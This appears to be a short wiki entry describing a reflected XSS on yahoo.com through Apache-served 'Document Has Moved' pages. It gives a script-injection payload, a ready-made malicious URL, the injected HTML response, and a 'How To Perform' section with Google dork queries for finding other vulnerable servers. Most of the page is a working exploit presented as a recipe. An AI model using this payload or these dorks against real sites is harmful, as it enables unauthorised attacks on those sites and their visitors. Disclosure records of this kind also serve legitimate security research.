XSS at yahoo.com

From Hackipedia
Jump to: navigation, search
OpenBugBounty #139816
Target: Yahoo.com
Target Module:
Type: XSS
Original Link
Payload R3NW4_KURD--><script>alert(/XSSPOSED/)</script>

Yahoo employed Apache Transport Servers that suffered from an XSS exploit on the moved_temporarily/moved_permanently pages.

More can be read about it here: Apache Ticket




How To Perform

You should be able to find instances of this XSS using Google dorks

intitle:"Document Has Moved"
"Description: The document you requested has moved to a new location.  The new location is"

Malicious URL

http://www.yahoo.com/R3NW4_KURD--><script>alert(/XSSPOSED/)</script>

Injection Example

<HTML>
<HEAD>
<TITLE>Document Has Moved</TITLE>
</HEAD>

<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Document Has Moved</H1>
<HR>

<FONT FACE="Helvetica,Arial"><B>
Description: The document you requested has moved to a new location.  The new location is "https://www.yahoo.com/R3NW4_KURD--><script>alert(/XSSPOSED/)</script>".
</B></FONT>
<HR>
</BODY>